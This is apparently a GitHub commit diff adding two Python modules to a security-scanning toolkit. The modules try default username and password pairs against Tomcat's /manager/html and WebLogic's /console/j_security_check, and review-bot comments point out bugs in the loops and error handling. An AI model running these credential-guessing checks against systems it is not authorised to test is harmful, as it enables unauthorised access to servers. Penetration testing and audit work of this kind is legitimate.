forked from iceyhexman/onlinetools
Commit
1 parent
21d3310
commit b67862f
Showing
15 changed files
with
480 additions
and
1,000 deletions.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,39 @@ | ||
#!/usr/bin/env python | ||
# -*- coding: utf-8 -*- | ||
''' | ||
name: Tomcat 弱口令漏洞 | ||
referer: unknown | ||
author: Lucifer | ||
description: tomcat 后台弱口令。 | ||
''' | ||
|
||
import json | ||
import base64 | ||
import requests | ||
|
||
class tomcat_weak_pass_BaseVerify: | ||
def __init__(self, url): | ||
self.url = url | ||
|
||
def run(self): | ||
userlist = ["tomcat","admin"] | ||
passlist = ["tomcat", "123456", "admin"] | ||
payload = "/manager/html" | ||
vulnurl = self.url + payload | ||
for username in userlist: | ||
for password in passlist: | ||
try: | ||
headers = { | ||
"Authorization":"Basic "+base64.b64encode(bytes(username.encode())+b":"+bytes(password.encode())).decode(), | ||
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", | ||
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" | ||
} | ||
req = requests.get(vulnurl, headers=headers, timeout=10, verify=False) | ||
if req.status_code == 200 and r"Applications" in req.text and r"Manager" in req.text: | ||
return "[+]存在Tomcat 弱口令漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps({username:password}, indent=4) | ||
else: | ||
return "no vuln" | ||
|
||
except: | ||
return "[-] ====>连接超时" | ||
|
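Review bot: The `else: return "no vuln"` branch sits inside the inner loop of `run()`, so the method returns after the first username/password pair and the rest of `userlist` and `passlist` is never evaluated; a "no vuln" verdict therefore covers far less than the report implies. Drop the `else:` branch and put `return "no vuln"` after the outer `for`, so the negative result is only reported once every configured pair has been checked. The weblogic `run()` in the next file has the same early return inside `for pwd in passwd:`. Separately, `bytes(username.encode())` is redundant, since `encode()` already returns bytes.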
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,39 @@ | ||
#!/usr/bin/env python | ||
# -*- coding: utf-8 -*- | ||
''' | ||
name: weblogic 弱口令漏洞 | ||
referer: unknown | ||
author: Lucifer | ||
description: weblogic 后台弱口令 | ||
''' | ||
|
||
import json | ||
import requests | ||
|
||
|
||
class weblogic_weak_pass_BaseVerify: | ||
def __init__(self, url): | ||
self.url = url | ||
|
||
def run(self): | ||
headers = { | ||
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50", | ||
"Content-Type":"application/x-www-form-urlencoded" | ||
} | ||
payload = "/console/j_security_check" | ||
passwd = ["weblogic", "weblogic1", "weblogic12", "weblogic123"] | ||
vulnurl = self.url + payload | ||
for pwd in passwd: | ||
post_data = { | ||
"j_username":"weblogic", | ||
"j_password":pwd | ||
} | ||
try: | ||
req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False, allow_redirects=False) | ||
if req.status_code == 302 and r"console" in req.text and r"LoginForm.jsp" not in req.text: | ||
return "[+]存在weblogic 弱口令漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4) | ||
else: | ||
return "no vuln" | ||
|
||
except: | ||
return "[-] ====>连接超时" |
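Review bot: The bare `except:` at the end of `run()` reports every failure as `[-] ====>连接超时` (connection timeout), including TLS errors, a malformed `self.url` and `KeyboardInterrupt`, so whoever reads the result cannot tell an unreachable host from a bug in the check. Use `except requests.exceptions.Timeout:` for the timeout message, handle `requests.exceptions.RequestException` separately for other transport errors, and let everything else propagate; the Tomcat check has the same handler. The success test also searches `req.text` of a 302 fetched with `allow_redirects=False`, whereas the redirect target is in the `Location` header, so checking `req.headers.get("Location", "")` would presumably be more reliable — worth confirming against a real console response. `verify=False` is passed without a comment saying why certificate validation is disabled.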